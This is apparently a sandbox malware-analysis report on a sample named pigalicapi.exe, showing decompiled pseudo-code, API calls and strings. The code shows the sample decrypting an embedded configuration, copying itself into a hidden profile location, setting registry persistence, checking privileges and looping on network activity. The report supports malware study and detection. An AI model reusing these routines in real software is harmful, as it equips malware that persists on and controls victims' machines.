Instruction ID: 09b4e067ca92482fb560cd3d12d9334f9f1ed9bfea5e74e004763440074e3414
Opcode Fuzzy Hash: 5b332cdf3e10b1c750763902a36ab61b9462757af9c839119db1d8ff2e707c1d
Instruction Fuzzy Hash: 28D120B1E40215EBEF28CF94DCD4FAA7779BB48705F048599F60AAB281D6709B80CF54

Uniqueness

Uniqueness Score: -1.00%

Function 024E47F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 178
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E024E47F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v5;
				long* _v12;
				char _v28;
				char _v764;
				char _v780;
				intOrPtr _v784;
				char _v788;
				int _v792;
				int _v796;
				intOrPtr _v800;
				long* _v804;
				int _v808;
				int _v812;
				char _v816;
				int _v820;
				char _v824;
				char _v828;
				char _v844;
				int _t61;
				char* _t67;
				intOrPtr _t68;
				int _t69;
				char* _t73;
				intOrPtr _t74;
				intOrPtr _t76;
				intOrPtr _t77;
				signed char _t78;
				void* _t109;

				_v5 = 0;
				if(_a4 == 0 || _a8 <= 0x300) {
					L25:
					return _v5;
				} else {
					_v12 = 0;
					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t61 == 0 && GetLastError() == 0x80090016) {
						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
					}
					if(_v12 != 0) {
						_v788 = 0x10;
						_v784 = 0x10;
						_v792 = 0;
						while(_v792 < _a8 - 0x2ff) {
							E024E7B70( &_v780, _a4 + _v792, 0x300);
							_t109 = _t109 + 0xc;
							_t67 =  &_v780;
							_v800 = _t67;
							_v796 = 0;
							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796);
							if(_t67 == 0) {
								L21:
								if((_v5 & 0x000000ff) == 0) {
									_v792 = _v792 + 1;
									continue;
								}
								break;
							}
							_t68 = _v800;
							__imp__CryptHashData(_v796, _t68, 0x10, 0);
							if(_t68 != 0) {
								_v804 = 0;
								_t69 = _v796;
								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
								if(_t69 != 0) {
									_v812 = 0x2f0;
									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
									CryptDestroyKey(_v804);
									if(_v808 != 0) {
										_t73 =  &_v816;
										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
										if(_t73 != 0) {
											_t74 = _v816;
											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
											if(_t74 != 0) {
												_v820 = 0;
												_v824 = 4;
												_t76 = _v816;
												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
												if(_t76 != 0) {
													_v828 = 0x10;
													_t77 = _v816;
													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
													if(_t77 != 0) {
														_t78 = E024E7C70( &_v28,  &_v844,  &_v28, 0x10);
														_t109 = _t109 + 0xc;
														if((_t78 & 0x000000ff) != 0) {
															E024E7B70(_a12,  &_v780, 0x300);
															_t109 = _t109 + 0xc;
															_v5 = 1;
														}
													}
												}
											}
											__imp__CryptDestroyHash(_v816);
										}
									}
								}
							}
							__imp__CryptDestroyHash(_v796);
							goto L21;
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L25;
				}
			}

0x024e47f9
0x024e4801
0x024e4aab
0x024e4ab1
0x024e4814
0x024e4814
0x024e482a
0x024e4832
0x024e4850
0x024e4850
0x024e485a
0x024e4860
0x024e486a
0x024e4874
0x024e488f
0x024e48b9
0x024e48be
0x024e48c1
0x024e48c7
0x024e48cd
0x024e48eb
0x024e48f3
0x024e4a90
0x024e4a96
0x024e4889
0x00000000
0x024e4889
0x00000000
0x024e4a98
0x024e48fd
0x024e490b
0x024e4913
0x024e4919
0x024e492c
0x024e493c
0x024e4944
0x024e494a
0x024e4975
0x024e4982
0x024e498f
0x024e4995
0x024e49a9
0x024e49b1
0x024e49c5
0x024e49cc
0x024e49d4
0x024e49da
0x024e49e4
0x024e4a00
0x024e4a07
0x024e4a0f
0x024e4a11
0x024e4a2d
0x024e4a34
0x024e4a3c
0x024e4a4b
0x024e4a50
0x024e4a58
0x024e4a6a
0x024e4a6f
0x024e4a72
0x024e4a72
0x024e4a58
0x024e4a3c
0x024e4a0f
0x024e4a7d
0x024e4a7d
0x024e49b1
0x024e498f
0x024e4944
0x024e4a8a
0x00000000
0x024e4a8a
0x024e4aa5
0x024e4aa5
0x00000000
0x024e485a

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E482A
GetLastError.KERNEL32 ref: 024E4834
CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E4850
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E48EB
CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 024E490B
CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 024E493C
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 024E496F
CryptDestroyKey.ADVAPI32(00000000), ref: 024E4982
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 024E49A9
CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 024E49CC
CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 024E4A07

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E481F
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E4845

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 2739279601-947817771
Opcode ID: fa4bdd773fad27bab30e7ebd558ad0faa04f12266293aff7e0ce22c65ec14a87
Instruction ID: 60fb6e0a90012b76936182255bc4f1c880527a7777d3290743f36148c922bcaa
Opcode Fuzzy Hash: fa4bdd773fad27bab30e7ebd558ad0faa04f12266293aff7e0ce22c65ec14a87
Instruction Fuzzy Hash: 1B715F71E40318ABFF25CB90CC89BEA777CAB48715F004599F60AAA1C1DBB59B84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 024E3B00 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 302
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			_entry_() {
				intOrPtr _v8;
				char _v1148;
				signed char _v1149;
				intOrPtr _v1156;
				char _v1556;
				char _v9556;
				long _v9560;
				char _v9564;
				char _v12068;
				signed int _v12072;
				char _v12076;
				long _v12080;
				char _v12081;
				long _v12088;
				long _v12092;
				long _v12096;
				signed int _v12100;
				signed char _v12101;
				long _v12108;
				signed int _v12112;
				void* _v12116;
				signed char _t69;
				intOrPtr _t74;
				signed char _t77;
				signed char _t79;
				signed int _t80;
				signed char _t85;
				signed char _t86;
				signed char _t87;
				intOrPtr _t88;
				char* _t89;
				signed int _t97;
				void* _t98;
				signed int _t100;
				signed char _t102;
				signed char _t104;
				signed char _t106;
				signed char _t110;
				signed int _t116;
				signed int _t118;
				char _t125;
				signed int _t138;
				signed int _t140;
				intOrPtr _t143;
				signed int _t159;
				signed int _t161;
				void* _t163;
				void* _t165;
				void* _t173;
				void* _t177;

				E024E1000(0x2f50);
				_v8 = E024E3130();
				E024E2ED0(_v8);
				GetModuleFileNameA(0, "C:\Users\alfons\pigalicapi.exe", 0x208);
				SetUnhandledExceptionFilter(E024E5DB0); // executed
				__imp__CoInitialize(0); // executed
				_t69 = E024E4510(_v8, 0x24f3c88); // executed
				_t165 = _t163 + 0xc;
				if((_t69 & 0x000000ff) == 0) {
					L39:
					ExitProcess(0);
				}
				E024E7D20( &_v1148,  &_v1148, 0, 0x46b);
				E024E5700( &_v1148); // executed
				_t143 =  *0x24f18a0; // 0x24f3b88
				_t74 = E024E5A00( &_v1148, _t143, 0xff); // executed
				_v1156 = _t74;
				E024E7D20(_t74, "Hogerfazwafx", 0, 0x12c);
				E024E9400( &_v1148, "Hogerfazwafx", 0xa); // executed
				_t77 = E024E99F0(); // executed
				 *0x24f435a = _t77;
				 *0x24f435d = E024E6060(); // executed
				_t79 = E024E5E00(); // executed
				 *0x24f435e = _t79;
				_t80 = StrStrIA("C:\Users\alfons\pigalicapi.exe", "svchost.exe"); // executed
				asm("sbb eax, eax");
				 *0x24f4362 =  ~( ~_t80);
				E024E1120("C:\Users\alfons\pigalicapi.exe", "pigalicapi",  *0x24f435a & 0x000000ff,  *0x24f4362 & 0x000000ff, 0x24f436c); // executed
				_t85 = E024E5E30(0); // executed
				 *0x24f435b = _t85;
				 *0x24f435f = 1; // executed
				_t86 = E024E6CF0(); // executed
				_v1149 = _t86;
				_t87 = E024E5F30(); // executed
				 *0x24f435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
				_t88 = E024E9B90(0xffffffff);
				_t173 = _t165 + 0x50;
				 *0x24f4364 = _t88;
				_t89 =  &_v1556;
				_push(_t89);
				_push(0x202); // executed
				L024EB1E6(); // executed
				if(_t89 != 0) {
					goto L39;
				} else {
					_t125 =  *0x24f19a8; // 0x1d
					_v12081 = _t125;
					 *0x24f4378 = 0x10;
					if(( *0x24f435f & 0x000000ff) != 0) {
						_t118 =  *0x24f4378; // 0x1b
						 *0x24f4378 = _t118 | 0x00000008;
					}
					if(( *0x24f435c & 0x000000ff) != 0) {
						_t161 =  *0x24f4378; // 0x1b
						 *0x24f4378 = _t161 | 0x00000001;
					}
					if(( *0x24f435b & 0x000000ff) != 0) {
						_t140 =  *0x24f4378; // 0x1b
						 *0x24f4378 = _t140 | 0x00000004;
					}
					if(( *0x24f435e & 0x000000ff) != 0) {
						_t116 =  *0x24f4378; // 0x1b
						 *0x24f4378 = _t116 | 0x00000002;
					}
					if(( *0x24f4360 & 0x000000ff) != 0) {
						_t159 =  *0x24f4378; // 0x1b
						 *0x24f4378 = _t159 | 0x00000020;
					}
					_t91 =  *0x24f4361 & 0x000000ff;
					if(( *0x24f4361 & 0x000000ff) != 0) {
						_t138 =  *0x24f4378; // 0x1b
						 *0x24f4378 = _t138 | 0x00000040;
					}
					_v9564 = 0x9c3;
					E024E7D20(_t91,  &_v12068, 0, 0x9c4);
					E024EA700();
					E024EA4B0( &_v12068,  &_v9564, 0x24f3cb6,  *0x24f3cb4 & 0x0000ffff);
					_v9560 = 0;
					_t97 = E024E5B50( &_v12068, ";",  &_v9560, 0); // executed
					_v12072 = _t97;
					_v12092 = 0;
					_v12080 = 0;
					_v12076 = 0x4b0;
					_t98 = E024E8A70(0x24f2c34,  &_v12076, 0x24f2ba8, 0x8c, 0x24ee008, 0x254); // executed
					_t177 = _t173 + 0x44;
					if(_t98 != 0) {
						E024E7D20( &_v9556,  &_v9556, 0, 0x1f40);
						E024E78D0(0x24f2c34, 0xc8,  &_v9556, 0xc8);
						_t177 = _t177 + 0x1c;
						_v12092 =  &_v9556;
						_v12080 = 0xc8;
					}
					_v12088 = 0;
					L17:
					_v12101 = 0;
					_v12108 = 0x1d4c0;
					_v12096 = 0;
					_t100 = E024E7970( &_v12096); // executed
					_v12100 = _t100;
					_t102 = E024E4020(_v12096, _v12100,  &_v1148, 1, 2, 0);
					_t177 = _t177 + 0x1c;
					if((_t102 & 0x000000ff) != 0) {
						_v12101 = 1;
					} else {
						_t104 = E024E4020(_v12092, _v12080,  &_v1148, 1, 5, 0);
						_t177 = _t177 + 0x18;
						if((_t104 & 0x000000ff) != 0) {
							_v12101 = 1;
						} else {
							_t106 = E024E4020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
							_t177 = _t177 + 0x18;
							if((_t106 & 0x000000ff) != 0) {
								_v12101 = 1;
							} else {
								_v12116 = 0;
								_v12112 = E024E42E0( &_v12116);
								_t110 = E024E4020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
								_t177 = _t177 + 0x1c;
								if((_t110 & 0x000000ff) != 0) {
									_v12101 = 1;
								}
								if(_v12116 != 0) {
									VirtualFree(_v12116, 0, 0x8000);
								}
							}
						}
					}
					if((_v12101 & 0x000000ff) != 0) {
						if( *0x24f18a4 != 1) {
							if( *0x24f18a4 == 2) {
								 *0x24f18a4 = 1;
								_v12108 = 0x1499700;
							}
						} else {
							if( *0x24f30e4 != 2) {
								_v12108 = 0x1499700;
							} else {
								_v12108 = 0x3e8;
								 *0x24f18a4 = 2;
							}
						}
					}
					Sleep(_v12108); // executed
					goto L17;
				}
			}

0x024e3b08
0x024e3b12
0x024e3b19
0x024e3b2d
0x024e3b38
0x024e3b40
0x024e3b4f
0x024e3b54
0x024e3b5c
0x024e400a
0x024e400c
0x024e400c
0x024e3b70
0x024e3b7f
0x024e3b8c
0x024e3b9a
0x024e3ba2
0x024e3bb4
0x024e3bca
0x024e3bd2
0x024e3bd7
0x024e3be1
0x024e3be6
0x024e3beb
0x024e3bfa
0x024e3c02
0x024e3c06
0x024e3c2a
0x024e3c34
0x024e3c3c
0x024e3c41
0x024e3c48
0x024e3c4d
0x024e3c53
0x024e3c64
0x024e3c6c
0x024e3c71
0x024e3c74
0x024e3c79
0x024e3c7f
0x024e3c80
0x024e3c85
0x024e3c8c
0x00000000
0x024e3c92
0x024e3c92
0x024e3c98
0x024e3c9e
0x024e3cb1
0x024e3cb3
0x024e3cbb
0x024e3cbb
0x024e3cc9
0x024e3ccb
0x024e3cd4
0x024e3cd4
0x024e3ce3
0x024e3ce5
0x024e3cee
0x024e3cee
0x024e3cfd
0x024e3cff
0x024e3d07
0x024e3d07
0x024e3d15
0x024e3d17
0x024e3d20
0x024e3d20
0x024e3d26
0x024e3d2f
0x024e3d31
0x024e3d3a
0x024e3d3a
0x024e3d40
0x024e3d58
0x024e3d60
0x024e3d80
0x024e3d88
0x024e3da7
0x024e3daf
0x024e3db5
0x024e3dbf
0x024e3dc9
0x024e3df3
0x024e3df8
0x024e3dfd
0x024e3e0d
0x024e3e2b
0x024e3e30
0x024e3e39
0x024e3e3f
0x024e3e3f
0x024e3e49
0x024e3e53
0x024e3e53
0x024e3e5a
0x024e3e64
0x024e3e75
0x024e3e7d
0x024e3e9e
0x024e3ea3
0x024e3eab
0x024e3f8a
0x024e3eb1
0x024e3ecc
0x024e3ed1
0x024e3ed9
0x024e3f81
0x024e3edf
0x024e3efa
0x024e3eff
0x024e3f07
0x024e3f78
0x024e3f09
0x024e3f09
0x024e3f22
0x024e3f43
0x024e3f48
0x024e3f50
0x024e3f52
0x024e3f52
0x024e3f60
0x024e3f70
0x024e3f70
0x024e3f76
0x024e3f7f
0x024e3f88
0x024e3f9a
0x024e3fa3
0x024e3fd7
0x024e3fd9
0x024e3fe3
0x024e3fe3
0x024e3fa5
0x024e3fac
0x024e3fc4
0x024e3fae
0x024e3fae
0x024e3fb8
0x024e3fb8
0x024e3fce
0x024e3fa3
0x024e3ff4
0x00000000
0x024e3ff4

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 024E3B2D
SetUnhandledExceptionFilter.KERNEL32(024E5DB0), ref: 024E3B38
CoInitialize.OLE32(00000000), ref: 024E3B40

Part of subcall function 024E4510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 024E456C
Part of subcall function 024E4510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E458B
Part of subcall function 024E4510: GetFileSize.KERNEL32(000000FF,00000000), ref: 024E45AD
Part of subcall function 024E4510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E45D6
Part of subcall function 024E4510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E4617
Part of subcall function 024E4510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E463E
Part of subcall function 024E4510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E47C0
Part of subcall function 024E4510: CloseHandle.KERNEL32(00000000), ref: 024E47E0

ExitProcess.KERNEL32 ref: 024E400C

Part of subcall function 024E5700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 024E5742
Part of subcall function 024E5700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 024E57B8
Part of subcall function 024E5700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 024E57F1
Part of subcall function 024E5700: wnsprintfA.SHLWAPI ref: 024E582F
Part of subcall function 024E5700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E5854
Part of subcall function 024E5700: GetFileSize.KERNEL32(000000FF,00000000), ref: 024E586D

Part of subcall function 024E5A00: lstrcpyA.KERNEL32(Mzsrkvcweomac,WDefault), ref: 024E5A47
Part of subcall function 024E5A00: lstrlenA.KERNEL32(024EC4E0), ref: 024E5A7D
Part of subcall function 024E5A00: lstrcpyA.KERNEL32(00000000,024EC4E0), ref: 024E5A97
Part of subcall function 024E5A00: lstrlenA.KERNEL32(00000000), ref: 024E5AA1
Part of subcall function 024E5A00: lstrlenA.KERNEL32(Mzsrkvcweomac), ref: 024E5AAE
Part of subcall function 024E5A00: lstrcatA.KERNEL32(00000000,Mzsrkvcweomac), ref: 024E5AC8
Part of subcall function 024E5A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 024E5B00
Part of subcall function 024E5A00: RegCloseKey.KERNEL32(00000000), ref: 024E5B0E
Part of subcall function 024E5A00: lstrlenA.KERNEL32(00000000), ref: 024E5B3B

Part of subcall function 024E9400: lstrcpyA.KERNEL32(?,00000000), ref: 024E9513
Part of subcall function 024E9400: CharUpperA.USER32(?), ref: 024E9521

Part of subcall function 024E99F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 024E9A0A
Part of subcall function 024E99F0: OpenProcessToken.ADVAPI32(00000000), ref: 024E9A11
Part of subcall function 024E99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 024E9A3A
Part of subcall function 024E99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 024E9A77
Part of subcall function 024E99F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 024E9AAD
Part of subcall function 024E99F0: EqualSid.ADVAPI32(?,00000000), ref: 024E9AC3

Part of subcall function 024E6060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 024E6082

Part of subcall function 024E5E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,024E3BEB), ref: 024E5E0C
Part of subcall function 024E5E00: GetLastError.KERNEL32(?,024E3BEB), ref: 024E5E12

StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 024E3BFA

Part of subcall function 024E1120: lstrlenA.KERNEL32(00000000), ref: 024E1148
Part of subcall function 024E1120: lstrlenA.KERNEL32(00000000), ref: 024E115A
Part of subcall function 024E1120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 024E1182
Part of subcall function 024E1120: wnsprintfA.SHLWAPI ref: 024E11BD
Part of subcall function 024E1120: lstrcmpiA.KERNEL32(00000104,?), ref: 024E11D1
Part of subcall function 024E1120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 024E11F0
Part of subcall function 024E1120: SetFileAttributesA.KERNEL32(?,00000006), ref: 024E11FF
Part of subcall function 024E1120: lstrcpyA.KERNEL32(00000104,?), ref: 024E1210
Part of subcall function 024E1120: lstrcpyA.KERNEL32(00000000,?), ref: 024E1249
Part of subcall function 024E1120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 024E125D
Part of subcall function 024E1120: CreateThread.KERNEL32 ref: 024E1274

Part of subcall function 024E5E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 024E5E7E
Part of subcall function 024E5E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 024E5EB2
Part of subcall function 024E5E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 024E5ED6
Part of subcall function 024E5E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E5F0B
Part of subcall function 024E5E30: RegCloseKey.KERNEL32(00000000), ref: 024E5F19

Part of subcall function 024E6CF0: RegOpenKeyExA.KERNEL32(80000001,024F3B88,00000000,000F003F,00000000), ref: 024E6D30
Part of subcall function 024E6CF0: RegQueryValueExA.KERNEL32(00000000,024F3FA6,00000000,00000003,?,00000020), ref: 024E6D61
Part of subcall function 024E6CF0: RegDeleteValueA.ADVAPI32(00000000,024F3FA6), ref: 024E6D7E
Part of subcall function 024E6CF0: RegCloseKey.ADVAPI32(00000000), ref: 024E6D88

Part of subcall function 024E5F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 024E5F67
Part of subcall function 024E5F30: lstrcatA.KERNEL32(?,024F3FE2), ref: 024E5F7A
Part of subcall function 024E5F30: RegOpenKeyExA.KERNEL32(80000001,024E3C58,00000000,000F003F,00000000), ref: 024E5FB3
Part of subcall function 024E5F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 024E5FF2
Part of subcall function 024E5F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E603B
Part of subcall function 024E5F30: RegCloseKey.KERNEL32(00000000), ref: 024E6045

WSAStartup.WS2_32(00000202,?), ref: 024E3C85

Part of subcall function 024E4020: InitializeCriticalSection.KERNEL32(?), ref: 024E4066
Part of subcall function 024E4020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 024E407A
Part of subcall function 024E4020: EnterCriticalSection.KERNEL32(?,?), ref: 024E40AF
Part of subcall function 024E4020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E40C6
Part of subcall function 024E4020: TerminateThread.KERNEL32(00000000,00000000), ref: 024E40E6
Part of subcall function 024E4020: ResetEvent.KERNEL32(00000000), ref: 024E40F7
Part of subcall function 024E4020: LeaveCriticalSection.KERNEL32(?), ref: 024E4101
Part of subcall function 024E4020: CreateThread.KERNEL32 ref: 024E4118

VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E3F70
Sleep.KERNEL32(?), ref: 024E3FF4

Strings

pigalicapi, xrefs: 024E3C20
svchost.exe, xrefs: 024E3BF0
C:\Users\user\pigalicapi.exe, xrefs: 024E3B26, 024E3BF5, 024E3C25
Hogerfazwafx, xrefs: 024E3BAF, 024E3BBE
R+g, xrefs: 024E3D7F

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
String ID: C:\Users\user\pigalicapi.exe$Hogerfazwafx$R+g$pigalicapi$svchost.exe
API String ID: 1389186475-402523118
Opcode ID: 77d4ab255f3ce90f5bf1c70bce828404351e212dcca690a8e3d8111d6d102290
Instruction ID: b18c6ab35e2ea4daecb3177aa7753593329833000f06519af5e63cc77cee2826
Opcode Fuzzy Hash: 77d4ab255f3ce90f5bf1c70bce828404351e212dcca690a8e3d8111d6d102290
Instruction Fuzzy Hash: A1C159B0E84365AAFF28DB64AC45BBB7BB16B44706F0404EEE34A571C1DBB04694CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00401179 Relevance: 21.2, APIs: 14, Instructions: 208
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401179() {
				void* _v16;
				signed int _v48;
				void* _v52;
				char _v96;
				void* _v112;
				void* _v113;
				signed int _v116;
				void* _v120;
				long _v132;
				void* _v136;
				long _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t48;
				signed int _t50;
				signed int _t51;
				long _t53;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr* _t57;
				_Unknown_base(*)()* _t59;
				signed char* _t63;
				signed int _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t70;
				long _t71;
				signed int _t72;
				void* _t73;
				void* _t77;
				signed int _t84;
				signed int _t85;
				long _t87;
				signed int _t88;
				signed int _t90;
				void* _t95;
				signed int _t96;
				struct _STARTUPINFOA* _t97;
				void* _t98;
				signed int _t100;
				signed int _t101;
				void* _t102;
				void* _t105;
				signed int _t106;
				intOrPtr _t108;
				void* _t109;
				long _t111;
				intOrPtr _t112;
				void* _t114;
				void* _t115;
				void* _t117;
				signed int _t121;
				void* _t122;
				void** _t123;

				while(1) {
					L1:
					_push(_t115);
					_t115 = _t117;
					_push(_t102);
					_push(_t108);
					_t97 =  &_v96;
					memset(_t97, 0, 0x11 << 2);
					_t48 = E0040DB20(0x30, _t86);
					_t50 =  &_v113 & 0xfffffff0;
					 *_t50 = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 4)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 8)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0xc)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0x10)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0x14)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0x18)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0x1c)) = 0xcccccccc;
					_t121 = _t117 - 0x0000007c + 0xc - _t48 & 0xfffffff0;
					_t51 =  *0x422054; // 0x1
					if(_t51 != 0) {
						GetStartupInfoA(_t97);
						_t121 = _t121 - 4;
					}
					_t109 = InterlockedCompareExchange;
					_t87 =  *( *[fs:0x18] + 4);
					_t105 = Sleep;
					while(1) {
						_t53 = InterlockedCompareExchange(0x422480, _t87, 0);
						_t122 = _t121 - 0xc;
						if(_t53 == 0) {
							break;
						}
						if(_t53 == _t87) {
							_t54 =  *0x422484; // 0x2
							_t86 = 1;
							if(_t54 != 1) {
								L7:
								_t55 =  *0x422484; // 0x2
								if(_t55 == 0) {
									 *0x422484 = 1;
									_v136 = 0x42c018;
									_v140 = 0x42c00c;
									L0040EE78();
								} else {
									 *0x422004 = 1;
								}
								_t56 =  *0x422484; // 0x2
								if(_t56 == 1) {
									goto L36;
								} else {
									goto L10;
								}
							} else {
								L35:
								_v140 = 0x1f;
								L0040EE70();
								_t84 =  *0x422484; // 0x2
								if(_t84 != 1) {
									L10:
									if(_t86 == 0) {
										goto L37;
									}
								} else {
									L36:
									_v136 = 0x42c008;
									_v140 = 0x42c000;
									L0040EE78();
									 *0x422484 = 2;
									if(_t86 == 0) {
										L37:
										InterlockedExchange(0x422480, 0);
										_t122 = _t122 - 8;
									}
								}
							}
							L43:
						} else {
							Sleep(0x3e8);
							_t121 = _t122 - 4;
							continue;
						}
						L11:
						_t57 =  *0x420a80; // 0x40ca60
						if(_t57 != 0) {
							_v132 = 0;
							_v136 = 2;
							_v140 = 0;
							 *_t57();
							_t122 = _t122 - 0xc; // executed
						}
						E0040D0C0(_t86, _t105, _t109); // executed
						_v140 = E0040CC00; // executed
						_t59 = SetUnhandledExceptionFilter(??); // executed
						_t123 = _t122 - 4;
						 *0x422064 = _t59;
						 *_t123 = 0x401000;
						E0040D3A0(E0040EE40());
						 *0x422474 = 0x400000;
						_t63 =  *_acmdln;
						if(_acmdln != 0) {
							_t96 = 0;
							while(1) {
								_t100 =  *_t63 & 0x000000ff;
								if(_t100 <= 0x20) {
									goto L15;
								}
								L20:
								_t86 = _t96 ^ 0x00000001;
								_t96 =  ==  ? _t96 ^ 0x00000001 : _t96;
								L18:
								_t63 =  &(_t63[1]);
								_t100 =  *_t63 & 0x000000ff;
								if(_t100 <= 0x20) {
									goto L15;
								}
								goto L24;
								L15:
								if(_t100 != 0) {
									if(_t96 == 0) {
										while(1) {
											_t63 =  &(_t63[1]);
											_t101 =  *_t63 & 0x000000ff;
											if(_t101 > 0x20) {
												goto L23;
											}
											if(_t101 != 0) {
												continue;
											}
											goto L23;
										}
									} else {
										_t96 = 1;
										goto L18;
									}
								}
								L23:
								 *0x422470 = _t63;
								goto L24;
							}
						}
						L24:
						_t106 =  *0x422054; // 0x1
						if(_t106 != 0) {
							_t81 =  !=  ? _v48 & 0x0000ffff : 0xa;
							 *0x41a000 =  !=  ? _v48 & 0x0000ffff : 0xa;
						}
